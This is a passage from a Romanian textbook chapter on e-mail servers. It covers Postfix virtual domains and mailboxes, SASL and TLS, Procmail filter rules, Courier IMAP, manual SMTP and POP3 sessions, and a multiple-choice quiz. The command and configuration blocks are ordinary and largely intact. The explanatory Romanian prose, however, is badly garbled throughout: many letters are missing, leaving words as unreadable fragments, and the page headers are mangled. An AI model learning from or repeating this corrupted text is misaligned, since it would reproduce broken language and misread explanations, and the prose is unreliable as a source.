I te faţa de alias-uri Sendmail nu permite ca utilizatorul virtual/alias-ul să o ţi ă şi u
nume de domeniu. Astfel, nu se poate face deosebirea între utilizatorul info@beta.com şi
info@alfa.com. Pentru aceasta se folosesc directive specializate Postfix pentru domenii
virtuale.
Directiva virtual_alias_domains specifi ă do e iile i tuale pe a e le se eşte Postfix.
Do e iile p e izate ai i u t e uie să se egăseas ă î ad ul di e ti ei mydestination:
cuirass:~# postconf -e 'virtual_alias_domains = alfa.com, beta.com'
Fişie ul ae a o ţi e alias-urile este precizat prin intermediul directivei

virtual_alias_maps:
cuirass:~# postconf -e 'virtual_alias_maps = hash:/etc/postfix/virtual_alias'
I t ă ile î fişie ul de alias-uri sunt în forma alias destinaţie:

cuirass:~# cat /etc/postfix/virtual_alias
info@alfa.com elena
info@beta.com florin
contact@alfa.com extern@example.org
Î o figu aţia de ai sus, esajele desti ate ăt e info@alfa.com vor fi livrate

utilizatorului local elena, iar cele destinate info@beta.com utilizatorului local florin. De
asemenea, mesajele destinate contact@alfa.com vor fi livrate contului
extern@example.org.
298 | ‘ e ţ e l e L o a l e
După o pleta ea fişie ului de alias-u i, a ti a ea se ealizează p i i te ediul o e zii

postmap:
cuirass:~# postmap /etc/postfix/virtual_alias
Da ă utilizato ii elena şi florin do es a ad esele su să pe t u esajele t i ise să fie

info@alfa.com, respectiv info@beta.com se foloseşte di e ti a canonical_maps. Se pot
folosi directivele sender_canonical_maps, respectiv recipient_canonical_maps da ă se
so eşte odifi a ea ad eselo su să, espe ti desti aţie:
cuirass:~# postconf -e 'sender_canonical_maps = hash:/etc/postfix/canonical'
cuirass:~# cat /etc/postfix/canonical
ana info@alfa.com
bogdan info@beta.com
cuirass:~# postconf -e 'local_header_rewrite_clients = permit_mynetworks,
permit_sasl_authenticated'
cuirass:~# postmap /etc/postfix/canonical
Directiva local_header_rewrite_clients sele teză lie ţii pe t u a e se a ealiza

sup as ie ea ad esei su să. A eastă opţiu e este utilă pe t u situaţia î a e se do eşte
substituţia o tu ilo di siste u ad ese de fo a Nume.Prenume.
8.5.6.3 Co figurare ăsuțe poştale irtuale

Un server de e- ail u foa te ulţi utilizato i a e esita e iste ţa u ui u ă foa te
mare de conturi. Dincolo de problemele de scalabilitate, gestiunea utilizatorilor devine
g eoaie. “oluţia este folosi ea de ăsuţe poştale i tuale. Utilizato ii o fi utilizato i i tuali ia
ăsuţa poştală a fi o i t a e spe ializată î siste ul lo al de fişie e.
Pe t u p e iza ea do e iilo a e foloses ăsuţe poştale i tuale se foloseşte di e ti a
virtual_mailbox_domains:
cuirass:~# postconf -e 'virtual_mailbox_domains = gamma.com'
De obicei se va asocia un director pentru fiecare domeniu virtual. Spre exemplu

/var/mail/vhosts/gamma.com pentru gamma.com. Directiva virtual_mailbox_base
spe ifi ă di e to ul de ază pe t u do e iile i tuale:
cuirass:~# postconf -e 'virtual_mailbox_base = /var/mail/vhosts'
Ca pâ ă a u , t e uie p e izat fişie ul e a o ţi e apă ile î t e ad esa de e- ail şi

i t a ea î siste ul de fişie e ep eze tâ d ăsuţa poştală i tuală:
cuirass:~# postconf -e 'virtual_mailbox_maps = hash:/etc/postfix/virtual'
cuirass:~# cat /etc/postfix/virtual
info@gamma.com gamma.com/info/
cuirass:~# postmap /etc/postfix/virtual
Î ad ul apă ii, i t a ea aso iată ăsuţei poştale i tuale este elati ă la

virtual_maibox_base. Î azul î a e ăsuţa poştală este î fo at Maildir se foloseşte u
caracter / slash la sfâ şit. Căsuţa poştală î fo at Maildir se eează u ajuto ul utilita ului
maildirmake:
cuirass:~# mkdir -p /var/mail/vhosts/gamma.com
cuirass:~# cd /var/mail/vhosts/gamma.com/
cuirass:/var/mail/vhosts/gamma.com# maildirmake info
cuirass:/var/mail/vhosts/gamma.com# ls -l
total 4
drwx------ 5 root mail 4096 2008-09-17 01:24 info
După u se o se ă, deţi ăto ul ăsuţei poştale i tuale este root. Căsuţa poştală
i tuală a fi a esată şi de se e ul POP /IMAP şi t e uie o figu at u utilizato o u atât
pentru livrare (Postfix ât şi pe t u a es POP /IMAP :
cuirass:/var/mail# useradd -g mail vmail
cuirass:/var/mail# id vmail
uid=1005(vmail) gid=8(mail) groups=8(mail)
299 | E - m a i l
cuirass:/var/mail# chown -R vmail:mail /var/mail/vhosts
A est utilizato t e uie p e izat şi î di e to ul p i ipal de o figu a e:

cuirass:/var/mail# postconf -e 'virtual_uid_maps = static:1005'
cuirass:/var/mail# postconf -e 'virtual_gid_maps = static:8'
cuirass:/var/mail# postfix reload
postfix/postfix-script: refreshing the Postfix mail system
Mesajele t a s ise ăt e
info@gamma.com o fi sto ate î ăsuţa poştală
/var/mail/vhosts/gamma.com/info/ în format Maildir. De aici vor putea fi citite prin
o figu a ea o espu zătoa e a u ui se e POP /IMAP.
8.5.7 Configurare suport SASL şi TLS
8.5.7.1 Suport TLS

Ulti ele e siu i de pa hete postfi > . ofe ă supo t i pli it pe t u TL“. Astfel, fişie ul
p i ipal de o figu a e o ţi e, î u a i stală ii, di e ti e spe ifi e pe t u supo t TL“:
cuirass:/etc/courier# cat /etc/postfix/main.cf | grep tls
smtpd_tls_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem
smtpd_tls_key_file=/etc/ssl/private/ssl-cert-snakeoil.key
smtpd_use_tls=yes
smtpd_tls_session_cache_database = btree:${data_directory}/smtpd_scache
smtp_tls_session_cache_database = btree:${data_directory}/smtp_scache
Certificatul folosit pentru autentificare este generat automat la instalare. Certificatul nu

este se at, î să, de o auto itate de e tifi a e şi a fu iza u a e tis e t î o e tul
o e tă ii lie tului.
8.5.7.2 Suport SASL

Pe t u aute tifi a e folosi d “A“L t e uie i stalată o se ie de pa hete spe ifi e:
cuirass:~# apt-get install libsasl2 sasl2-bin libsasl2-modules
Î o ti ua e t e uie a ti ată aute tifi a ea folosi “A“L:

cuirass:~# postconf -e 'smtpd_sasl_local_domain ='
cuirass:~# postconf -e 'smtpd_sasl_auth_enable = yes'
cuirass:~# postconf -e 'smtpd_sasl_security_options = noanonymous'
cuirass:~# postconf -e 'broken_sasl_auth_clients = yes'
cuirass:~# postconf -e 'smtpd_recipient_restrictions =
permit_sasl_authenticated,permit_mynetworks,reject_unauth_destination'
Î plus, î fişie ul /etc/postfix/sasl/smtpd.conf se spe ifi ă etoda de aute tifi a e:

cuirass:~# echo 'pwcheck_method: saslauthd' >> /etc/postfix/sasl/smtpd.conf
cuirass:~# echo 'mech_list: plain login' >> /etc/postfix/sasl/smtpd.conf
Î ulti ă fază t e uie a ti at daemonul saslauthd. Întrucât Postfix ulează î t -un jail
chroot, saslauthd t e uie o figu at o espu zăto . Fişie ul de o figu a e pe t u
saslauthd este /etc/default/saslauthd. “e eează di e to ul /var/spool/postfix/
var/run/saslauthd:
cuirass:~# mkdir -p /var/spool/postfix/var/run/saslauthd
şi se o figu ează o espu zăto se i iul de aute tifi a e p i odifi a ea li iei:

OPTIONS="-c -m var/run/saslauthd"
în
OPTIONS="-c -m /var/spool/postfix/var/run/saslauthd"
De o i ei se a a ti a po i ea auto ată a saslauthd:

START=yes
300 | ‘ e ţ e l e L o a l e
În a se ţa u o e a is e de e ifi a e lo ală a utilizato ului, se e o a dă folosi ea

mecanismului shadow a e foloseşte fişie ul lo al pe t u aute tifi a ea utilizato ilo
(/etc/shadow):
MECHANISMS="shadow"
“e po eşte daemonul de autentificare:

cuirass:~# /etc/init.d/saslauthd start
Starting SASL Authentication Daemon: saslauthd.
8.5.7.2.1 Pachete noi (Debian Lenny)

Î dist i uţiile e e te, folosi ea saslauthd este o diţio ată de e o figu a ea
d eptu ilo şi apa te e ţelo :
cuirass:~# dpkg-statoverride --add root sasl 710 /var/spool/postfix/var/run/saslauthd
cuirass:~# adduser postfix sasl
Adding user `postfix' to group `sasl' ...
Adding user postfix to group sasl
Done.
Ulte io se epo eşte daemonul saslauthd şi Postfix:

cuirass:~# /etc/init.d/saslauthd restart
Stopping SASL Authentication Daemon: saslauthd.
Starting SASL Authentication Daemon: saslauthd.
8.5.7.3 Verificare
Pe t u e ifi a ea supo tului “A“L şi TL“ se foloseşte o a da “MTP EHLO:
cuirass:~# telnet localhost 25
Trying 127.0.0.1...
Connected to localhost.
220 cuirass.localdomain ESMTP Postfix (2.5.5)
EHLO localhost
250-cuirass.localdomain
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-STARTTLS
250-AUTH LOGIN PLAIN
250-AUTH=LOGIN PLAIN
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
P eze ţa li iilo “TA‘TTL“ şi AUTH LOGIN PLAIN î sea ă supo t alid TL“ şi “A“L pe tru
Postfi . Pe t u folosi ea a estui supo t lie ţii de e- ail t e uie o figu aţi o espu zăto .
8.6 MDA
În general, serverele de e-mail despre care s-a dis utat pâ ă a u i lud o o po e tă
a e se o upă de li a ea lo ală a esajelo . E istă, î să, situaţii î a e se do eşte ai ultă
fle i ilitate î li a ea esajelo , de la a a ja ea esajelo î utii poştale spe iale î fu ţie
de p o e ie ţa lo , pâ ă la a ti a ea de filt e antispam. Spre exemplu, Sendmail u ofe ă
supo t pe t u ăsuţe poştale î fo mat Maildir. Î a eastă situaţie t e uie folosit u MDA
pe t u li a ea esajelo ăt e ăsuţele poştale î fo at Maildir.
8.6.1 Procmail
Procmail fo ează, î p eu ă u Maildrop, ele ai u os ute două MDA-uri. Procmail
este, de obicei, instalat implicit pe dist i uţiile Debian-based. Altfel, se poate instala folosind
apt-get:
301 | E - m a i l
# apt-get install procmail
8.6.1.1 I tera țiu ea u Pro ail

Deşi Procmail poate ula a apli aţie de si e stătătoa e, este i o at de o i ei de MTA.
Pentru a configura Postfix să foloseas ă Procmail se adaugă li ia:
mailbox_command = /path/to/procmail -a $EXTENSION
Folosi ea li iei de ai sus deza ti ează o figu a ea ofe ită de home_mailbox.
8.6.1.2 Configurarea Procmail

Configurarea Procmail se fa e p i i te ediul fişie ului glo al de o figu are
/etc/procmailrc da ă e istă şi a u ui fişie lo al de o figu a e: $HOME/.procmailrc.
Î o e tul e epţio ă ii u ui esaj, Procmail a î epe p o esa ea fişie ului
/etc/procmailrc şi apoi a fişie ului .procmailrc din home-ul utilizatorului. Un astfel de fişie
este compus dintr-o pa te de de la aţii şi o pa te de eguli de filt a e recipes).
Da ă se do eşte t a s ite ea glo ală a esajelo ăt e ăsuţe poştale i tuale î fo at
Maildir se o figu ează o espu zăto fişie ul glo al de o figu a e:
cuirass:~# cat /etc/procmailrc
DEFAULT=$HOME/Maildir/
MAILDIR=$HOME/Maildir
LOGFILE=/usr/local/proc.log
Mai jos este p eze tat u e e plu si plu de fişie lo al de o figu a e

bogdan@cuirass:~$ cat .procmailrc
PATH=/bin:/usr/bin:/usr/local/bin
SHELL=/bin/bash
LOGFILE=$HOME/proclog
DEFAULT=$HOME/Maildir/
MAILDIR=$HOME/Maildir
:0:
* ^Subject: .*test.*
$MAILDIR/.Test/
# catch-all rule
:0
$HOME/Maildir/
8.6.1.2.1 Directive de configurare

Directivele sunt definite în forma NUME=valoare. În exemplul de mai sus, se definesc
di e ti ele DEFAULT şi MAILDI‘ pe t u a p e iza i t a ea î siste ul de fişie e aso iată ăsuţei
poştale i tuale. Di e ti a LOGFILE p e izează fişie ul folosit pe t u ju aliza e. Î azul î a e
u se do eşte sto a ea ju alelo se poate folosi /dev/null. Di e ti a PATH este utilă î azul
î a e se foloses o e zi de filt a e e te e şi, di o side e te de efi ie ţă, u se do eşte
folosi ea ăii o plete ăt e o a dă.
8.6.1.2.2 Reguli de filtrare

Orice egulă î epe u a a te ele :0 urmate de unul sau mai multe câmpuri de control şi,
opţio al, de spe ifi a ea u ui fişie pe t u lock utilizat pe t u a p e e i odifi a ea si ulta ă
a lo aţiei u de a fi sal at esajul. Pe li iile u ătoa e se pot spe ifi a u a sau ai ulte
o diţii u ate de o li ie e ep ezi tă a ţiu ea apli ată da ă toate o diţiile a te ioa e su t
valabile. Formal, formatul este:
:0 [flags] [: [lock-file] ]
zero or more conditions
one action line
Î e e plul de ai sus, esajele al ă o su ie t o ţi şi ul test sunt stocate în

directorul .Test. Directorul .Test corespunde unui director Test vizibil din clientul de e-mail
302 | ‘ e ţ e l e L o a l e
î azul folosi ii u ei ăsuţe poştale î fo at Maildir. Ulti a egulă catch-all , sto hează
esajele î ăsuţa poştală î fo at Maildir. Folosi ea a a te ului două puncte în cazul primei
eguli î sea ă folosi ea fişie ului i pli it de locking.
Cele mai importante câmpuri de control sunt:
 H - e ifi a ea o diţiilo se fa e î a tetul esajului H = header ; da ă u se spe ifi ă i i ,
acest câmp este configurat implicit;
 B - e ifi a ea o diţiilo se fa e î o pul esajului;
 D - case sensitive i pli it u se fa e disti ţie î t e lite ele a i şi i i ;
 c - se ge e ează o opie a esajului;
 w - se aşteaptă a p og a ul sau filt ul să se te i e şi e ifi ă aloa ea de ieşi e a a estuia
odul de etu ; da ă u s-a terminat cu succes, atunci filtrul nu este aplicat.
Co diţiile su t fo ate di e p esii egulate la a e se adaugă âţi a operatori speciali
u a fi „! pe t u i e sa ea o diţiei sau „< espe ti „> pentru a compara dimensiunea
mesajului cu anumite limite.
A ţiu ile e pot fi apli ate su t:
 o i t a e î siste ul lo al de fişie e u de a fi sto at esajul;
 ! - t i ite esajul la ad esa spe ifi ată;
 | - po eşte u p og a spe ifi at;
 { } - spe ifi ă u lo î i te io ul ă uia pute spe ifi a alte eguli.
8.6.1.3 Câteva exemple

În continuare sunt prezentate câteva exemple de reguli de filtrare. Mai multe exemple
sunt descrise în pagina de manual procmailex(5).
 se sal ează î utia poştală mail/stiri/agora toate esajele al ă o â p From o ţi e
expresia agnews@agora.ro:
:0
* From: .*agnews@agora.ro
mail/stiri/agora
 se t i it toate esajele ăt e rc@cs.pub.ro:

:0
! rc@cs.pub.ro
 se ge e ează o opie a esajului şi se t i ite ăt e rc@cs.pub.ro; mesajul original va fi

e ifi at î o ti ua e u egulile u ătoa e:
:0c
! rc@cs.pub.ro
 pentru toate mesajele cu subiectul [humor] se a ge e a o opie e a fi t i isă la

rc@cs.pub.ro, ia opia lo ală se a sto a î t -o utie poştală defi ită, î fişie ul
/liste/humor:
:0
* ^Subject:.*[humor]
{
:0 c
! rc@cs.pub.ro
:0
mail/liste/humor
}
 se filt ează u SpamAssassin toate esajele u di e siu ea ai i ă de kB:

:0fw
* < 262144
| /usr/bin/spamassassin -P
303 | E - m a i l
8.7 Servere de IMAP

Cele ai ăspândite servere de IMAP pentru platforme Unix sunt Courier IMAP Server,
University of Washington imapd şi Cyrus IMAP Server de la Carnegie Mellon University.
8.7.1 Courier IMAP Server

Courier IMAP Server este o o po e tă a se e ului Courier. Nu ofe ă supo t pentru
formatul mbox ci doar pentru Maildir. “e e ul i ple e tează e te sii ale a estui fo at,
pe iţâ d, sp e e e plu, posi ilitatea sta ili ii u o li ite quota sau st u tu a ea ie a hi ă a
mailbox-urilor. Serverul are trei avantaje importante:
 permite defi i ea de ăsuţe poştale i tuale;
 are numeroase module de autentificare;
 ofe ă posi ilitatea li ită ii u ă ului de o e iu i IMAP de la o a u ită ad esă IP.
O altă a a te isti ă este posi ilitatea pa tajă ii ăsuţelo poştale î t e ai ulţi
utilizatori.
Courier IMAP Server a fost construit într-o a ie ă odula izată pe t u a pe ite u
consum minim de resurse.
8.7.1.1 Instalare
I stala ea se e ului se ealizează p i i te ediul i stală ii pa hetului courier-imap.
# apt-get install courier-imap
“i gu a î t e a e a e se pu e la i stala ea pa hetului este da ă se do eşte ea ea u ei

st u tu i de di e toa e pe t u o figu a e a e pe ite o figu a ea folosi d o i te faţă e .
I stala ea pa hetului şi a depe di ţelo a estuia o du e la ula ea u ui server de IMAP
(imapd pe po tul i pli it şi a u ui set de utilita e spe ifi e. U utilita i po ta t este
maildirmake care permite crearea unui director în format Maildir ep eze tâ d ăsuţa
poştală folosită pe t u e epţio a ea esajelo .
8.7.1.2 Configurare
Fişie ele de o figu a e pe t u se e ul de IMAP se găses î /etc/courier/ şi su t
imapd, pe t u o figu a ea fu ţio alităţii se e ului, şi authdaemonrc, pentru configurarea
daemon-ului de autentificare.
Di e ti ele di fişie ul imapd sunt în formatul NUME=valoare. Aici se pot schimba adresa
pe a e as ultă se e ul, po tul, u ă ul de p o ese a e pot fi des hise, u ă ul a i de
conexiuni, etc. De asemenea, aici se pot stabili alte valori pentru numele directoarelor
implicite, prin alterarea di e ti elo espe ti e. Astfel, da ă se do eşte s hi a ea u elui
di e to ului i pli it de e epţie a esajelo (Maildir), se va înlocui linia
MAILDIRPATH=Maildir
cu
MAILDIRPATH=Mymail
Comanda makemaildir este utilizată pe t u ea ea u ui di e to u formatul utilizat de

Courier (maildir . O opţiu e utilă î ad ul a estei o e zi este posi ilitatea aso ie ii u ei
cote (quota . Mai jos su t p eze tate două e e ple de utiliza e. Co a da:
bogdan@cuirass:~$ ls
bogdan@cuirass:~$ maildirmake Maildir
bogdan@cuirass:~$ ls
Maildir
eează u di e to fo at Maildir î di e to ul de ază al utilizato ului; o a da:

304 | ‘ e ţ e l e L o a l e
$ maildirmake -q 10000000S $HOME/Maildir
eează u di e to fo at Maildir î di e to ul de ază al utilizato ului u o otă de

MB. Trebuie spe ifi at faptul ă u ai a u ite LDA-uri (Courier Maildrop şi deliverquota) vor
ţi e o t de otele i puse î t -o astfel de utilizare.
8.7.1.3 Utilizarea Courier IMAP cu Postfix

Serverul Postfix u lu ează i pli it u fo atul Maildir. Pentru aceasta va trebui
odifi at o espu zăto fişie ul de o figu a e /etc/postfix/main.cf, prin alterarea
directivei home_mailbox şi ig o a ea di e ti ei mailbox_command:
cuirass:/etc/courier# postconf home_mailbox
home_mailbox =
cuirass:/etc/courier# postconf -e 'home_mailbox = Maildir/'
cuirass:/etc/courier# postconf home_mailbox
home_mailbox = Maildir/
cuirass:~# cat /etc/postfix/main.cf | grep command
#mailbox_command = procmail -a "$EXTENSION"
Nu trebuie omis caracterul / de la sfâ şitul fişie ul Maildir.

Anumite MTA-u i u ofe ă supo t pe t u fo atul Maildir. Î a eastă situaţie li a ea
esajelo t e uie delegată u ui MDA p e u Procmail sau Maildrop.
8.7.1.4 Suport SSL

Suportul IMAP peste SSL în cazul Courier IMAP este asigurat prin instalarea pachetului
courier-imap-ssl:
cuirass:~# apt-get install courier-imap-ssl
Î ad ul i stală ii pa hetului se ge e ează şi u e tifi at pe t u aute tifi a e î

/etc/courier/imapd.pem.
“e e ul IMAP“ as ultă o e iu i pe po tul :
cuirass:/etc/courier# netstat -tlnp | grep 993
tcp6 0 0 :::993 :::* LISTEN 2173/couriertcpd
Fişie ul /etc/courier/imapd-ssl este fişie ul de o figu a e pe t u se e ul IMAP“.
8.7.1.5 Co figurarea a esului la ăsuțe poştale irtuale

Courier IMAP poate fi configurat pentru accesarea esajelo di ăsuţe poştale i tuale
adi ă i t ă i spe ializate î siste ul de fişie e. Pe t u a easta t e uie o figu at daemonul de
autentificare – authdaemond p i i te ediul fişie ului /etc/courier/authdaemonrc.
Î p i a fază t e uie folosit odulul authuserdb a e pe ite o figu a ea fa ilă a
utilizato ilo i tuali. A est lu u se ealizează p i alte a ea di e ti ei de o figu a e
authmodulelist:
authmodulelist="authuserdb authpam"
După o figu a e t e uie epo it daemon-ul de autentificare cu ajutorul scriptului

invoke-rc.d:
cuirass:~# invoke-rc.d courier-authdaemon reload
Stopping Courier authentication services: authdaemond.
Starting Courier authentication services: authdaemond.
Î o ti ua e se adaugă utilizato ul info în baza de date de utilizato i şi se a ti ează. Se

presupune ăsuţa poştală i tuală des isă î se ţiu ea aso iată Postfix [TODO] pentru contul
info@gamma.com:
cuirass:~# userdb info set uid=1005 gid=8 home=/var/mail/vhosts/gamma.com/info
mail=/var/mail/vhosts/gamma.com/info
cuirass:~# userdbpw -md5 | userdb info set systempw
305 | E - m a i l
Password:
Reenter password:
cuirass:~# makeuserdb
În continuare clientul de e- ail se o figu ează pe t u iti ea esajelo de pe o tul

info@gamma.com.
Pentru depistarea eventualelor erori de autentifi a e, se e o a dă a ti a ea opţiu ii de
ju aliza e a ope aţiei î fişie ul de o figu a e /etc/courier/authdaemonrc:
DEBUG_LOGIN=1
8.8 Webmail
Î od f e e t, a esa ea ăsuţelo poştale se ealizează utilizâ d dife iţi lie ţi
IMAP/POP i stalaţi pe sistemul clientului, cum sunt, spre exemplu, Mozilla Thunderbird,
Outlook Express, Kmail, Evolution, Mutt, et . Î ulte situaţii se do eşte posi ilitatea a esă ii
apide a ăsuţei poştale de pe dife ite siste e fă ă a i stala sau o figu a pe a estea u lient
de e-mail. Pe t u ase e ea situaţii e istă apli aţii de a esa e a ăsuţelo poştale p i
i te faţa e . Cele ai u os ute, la o e tul a tual, su t Horde, “ ui elMail şi
RoundCube.
8.9 Studii de caz

8.9.1 Comenzi SMTP. Transmiterea unui mesaj folosind SMTP
Se vor p eze ta, î o ti ua e, ele ai utilizate o e zi “MTP, fă ă a i t a î detalii de
si ta ă. U od si plu de a t a s ite u esaj a ual fă ă utiliza ea u ui MUA este
conectarea la un server SMTP pe portul 25 utilizând telnet, ca în exemplul ce ur ează:
root@MPLS-2:/home/mpls2# telnet localhost 25
Trying 127.0.0.1...
Connected to localhost.localdomain.
220 localhost.localdomain ESMTP Postfix (Debian/GNU)
EHLO test
250-localhost.localdomain
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250 8BITMIME
MAIL FROM: mpls2@MPLS-2.cs.pub.ro
250 Ok
RCPT TO: razvand@gmail.com
250 Ok
DATA
354 End data with <CR><LF>.<CR><LF>
hello,
un mesaj simplu.
.
250 Ok: queued as 0BC1A211F64
QUIT
221 Bye
Connection closed by foreign host.
HELO - o a dă utilizată pe t u ide tifi a ea se e ului şi a lie tului “MTP. Clie tul a
i iţia sesiu ea p i t -o astfel de o a dă î a e îşi a u ţă u ele o plet FQDN - Fully
Qualified Domain Name . Da ă se e ul a eptă sesiu ea, a ăspu de u odul 50 urmat de
u ele său.
MAIL FROM - este p i a di o e zile utilizate pe t u t i ite ea efe ti ă a esajului şi
a e a ol spe ifi a ea ide tităţii auto ului esajului. Da ă ăspu sul se e ului este OK
u î sea ă a esajul a fi eapă at li at, deoa e e, î fu ţie de alte o e zi, se poate
întoarce un cod de eroare.
RCPT TO - pe ite spe ifi a ea desti ata ului esajului. Da ă se e ul e u oaşte
utilizato ul, atu i se a ăspu de u OK; astfel se a etu a u od de e oa e
306 | ‘ e ţ e l e L o a l e
o espu zăto . Da ă se do eşte a esajul sa aju gă la ai ulte desti aţii se a folosi

comanda RCPT TO de ai ulte o i. De e a at este faptul ă sta da dul pe ite a
adresele specificate prin comenzile MAIL FROM şi RCPT TO să fie dife ite de ele spe ifi ate de
câmpurile From şi To di o pul esajului. Da , după u s-a precizat, mesajele sunt livrate în
fu ţie de i fo aţiile t a s ise p i “MTP, u de eea e apa e î o ţi ut.
DATA - permite specificarea corpului mesajului. Acesta are o succesiune de linii,
succesiu e î heiată u a a te ul „. plasat si gu pe o li ie. Co ţi utul său a t e ui să fie
o fo fo atului p e izat î ‘FC , adi ă să o ţi ă â pu ile Date, Subject, To,
Cc, From, da u este o e i ţă o ligato ie i pusă de sta da dul “MTP.
RSET - pe ite a ula ea t a za ţiei u e te. “e e ul a şte ge buffer-ele alocate
esajului u e t şi a e e i î sta ea de după HELO. Co e iu ea u lie tul u este
î t e uptă.
VRFY - pe ite e ifi a ea alidităţii ăsuţei poştale pe t u u utilizator specificat ca
parametru.
EXPN - pe ite e ifi a ea da ă o ad esă spe ifi ată este o listă de dis uţii şi, î az
afi ati , afişează e ii listei espe ti e.
NOOP - o a dă de testa e a o e iu ii. Nu se efe tuează nicio ope aţie; se e ul t e uie
să ăspu dă u OK.
QUIT - o a dă utilizată pe t u î t e upe ea o e iu ii u se e ul.
HELP - o a dă de ajuto .
8.9.2 Comenzi POP3. Citirea unui mesaj folosind POP3

P i t e ele ai utilizate o e zi POP su t u ătoa ele:
USER username/PASS password - su t î totdeau a p i ele o e zi folosite după
sta ili ea o e iu ii î t e lie tul şi se e ul de POP . “u t folosite pe t u aute tifi a ea
lie tului la se e . Da ă i fo aţiile de aute tifi a e su t o e te şi se e ul euşeşte să
o ţi ă u lock asup a ăsuţei poştale pe t u a u putea fi odifi ată de u alt lie t
si ulta , atu i î toa e ăspu s poziti . Co a da APOP este opţio ală pe t u se e ele
POP şi a fost i t odusă di auza i o e ie tului o e zii PASS de a trimite parola în clar.
U i e e plu de fu ţio a e a p oto olului POP p i o e ta e la se e pe po tul
şi utiliza e telnet este u ăto ul:
mpls2@MPLS-2:~$ telnet localhost 110
Trying 127.0.0.1...
+OK
USER: mpls2
-ERR
USER mpls2
+OK
PASS parola2
+OK
LIST
+OK
1 831
2 505
3 521
.
RETR 3
+OK
Return-Path: <mpls2@MPLS-2.cs.pub.ro>
X-Original-To: mpls2@localhost.localdomain
Delivered-To: mpls2@localhost.localdomain
Received: from test (localhost.localdomain [127.0.0.1])
by localhost.localdomain (Postfix) with SMTP id 9695E211F64
for <mpls2@localhost.localdomain>; Tue, 20 Sep 2005 12:37:35 +0300 (EEST)
Message-Id: <20050920093735.9695E211F64@localhost.localdomain>
Date: Tue, 20 Sep 2005 12:37:35 +0300 (EEST)
From: mpls2@MPLS-2.cs.pub.ro
To: undisclosed-recipients:;
yet another simple message

307 | E - m a i l
.
DELE 1
+OK
LIST
+OK
2 505
3 521
.
QUIT
+OK
STAT - soli ită se e ului i fo aţii desp e ăsuţa poştală a utilizato ului. U ăspu s
pozitiv din partea serverului este +OK <numar_mesaje> <dimensiune_totala>.
LIST - da ă a eastă o a dă este apelată fă ă niciun a gu e t, se e ul a afişa i fo aţii
desp e esaje, âte o li ie pe t u fie a e. Co a da se poate apela şi a â d a argument un
u ă de esaj, se e ul etu â d î a est az doa li ia o espu zătoa e esajului. Nu se
poate i o a pe t u esajele a ate pe t u şte ge e.
RETR msg - afişează o ţi utul esajului msg; o i e o a dă ulte ioa ă u efe i e la a est
mesaj va genera o eroare.
DELE msg - a hează esajul msg pe t u şte ge e; esajele u o fi şte se efe ti de ât
la închiderea sesiunii.
NOOP - clientul u soli ită i io a ţiu e, i doa ăspu s poziti di pa tea se e ului.
RSET - a ulează a ajul de şte ge e pe t u toate esajele a ate.
QUIT - se e ul a şte ge toate esajele a ate pe t u şte ge e şi a etu a +OK sau -
ERR î fu ţie de euşita ope aţiei.
HELP - o a dă de ajuto .
308 | ‘ e ţ e l e L o a l e
Î tre ări
1. Ca e afi aţii su t ade ă ate î eea e p i eşte siste ul de poştă ele t o i ă?
 SMTP este protocolul utilizat între MTA (Mail Transfer Agent).
 “MTP este p oto olul utilizat de ăt e o apli aţie de tip MUA Mail User Agent) pentru a
transfera mesajele de pe server.
 “MTP utilizează po tul .
 SMTP nu este folosit pe t u poştă ele t o i ă.
2. Pe t u u se e “MTP, te e ul de ela i g ep ezi tă:

 a primi un mesaj care nu este destinat unui utilizator din domeniile gestionate de server
şi a-l t a s ite ai depa te ăt e desti aţie.
 a primi un mesaj care este desti at u ui utilizato di do e iile gestio ate de se e şi
a-l t a s ite ai depa te ăt e desti aţie.
 termenul de relaying are sens în contextul unui Mail User Agent, nu al unui server
SMTP.
 niciunul di ăspu su ile de ai sus.
3. Protocolul IMAP pe ite alegeţi a ia te :

 gestiunea offline a mesajelor.
 structurarea pe directoare a mesajelor.
 transferul de mesaje între MTA (Mail Transfer Agent).
 a esa ea doa a u ei si gu e ăsute poştale la u o e t dat.
4. Ca e di u ătoa ele a ia te NU este un server de IMAP?

 Postfix
 Courier
 Cyrus
 Dovecot
5. Ca e di u ătoa ele di e ti e NU este o di e ti ă Postfi ?

 home_mailbox
 sender_canonical_maps
 mynetworks
 mod_ssl
6. Ca e di u ătoa ele po tu i NU este aso iat se i iului de e-mail?

 53
 993
 25
 587
7. Ca e di u ătoa ele afi aţii desp e Postfi este falsă?

 este o apli aţie o oliti ă
 poate gestiona domenii virtuale
 are suport pentru formatul Maildir
 a e supo t pe t u ăsuţe poştale i tuale
309 | E - m a i l
8. Ca e este o di ea o e tă a t a s ite ii şi a esă ii u ui mesaj?

 MUA, MTA, MTA, MDA, server IMAP, MUA
 MUA, MDA, MTA, MUA, MTA, server IMAP
 MUA, server IMAP, MTA, MDA, MTA
 MDA, MUA, MTA, server IMAP, MTA
9. Ce ep ezi tă u do e iu i tual?
 u do e iu ai ă ui utilizato i u e istă efe ti pe se e .
 un domeniu pentru care nu se face relay.
 un nume alternativ la serverului de mail.
 niciuna din variantele de mai sus.
10. Ca e este efe tul u ătoa elo filt e î P o ail?

:0
! test1@cs.pub.ro
:0c
* Subject:.*retele
! test2@cs.pub.ro
 toate mesajele sunt forwardate ăt e test1@cs.pub.ro.

 toate esajele su t fo a date ăt e test1@cs.pub.ro şi î plus, a ele esaje a e
o ţi î su ie t u â tul etele su t fo a date ăt e test2@cs.pub.ro.
 toate esajele su t fo a date ăt e test1@cs.pub.ro şi î plus, o opie a acelor
esaje a e o ţi î su ie t u â tul etele su t fo a date ăt e test2@cs.pub.ro.
 niciuna dintre variantele de mai sus.
310 | ‘ e ţ e l e L o a l e
9 World Wide Web

If ou do 't ha e a E-mail address, you're in the Netherworld. If you don't have your own
World Wide We page, ou' e a o od .
Clifford Stoll

 Ce este World Wide Web-ul
 Care sunt tehnologiile fundamentale ale web-ului
 Cu fu ţio ează se i iul de e
 Configurarea serverului de web Apache2.2
 Configurarea IIS7 pe Windows
Cine este...
Sir Tim Berners-Lee este e etăto ul editat u i e ta ea Wo ld Wide We -ului. Pe
de e ie a ealizat p i a o u i aţie HTTP î I te et î t e u se e și u
client. În prezent este directorul World Wide Web Consortium (W3C).
Robert McCool este autorul webserver-ului NCSA HTTPd, ulterior cunoscut sub numele
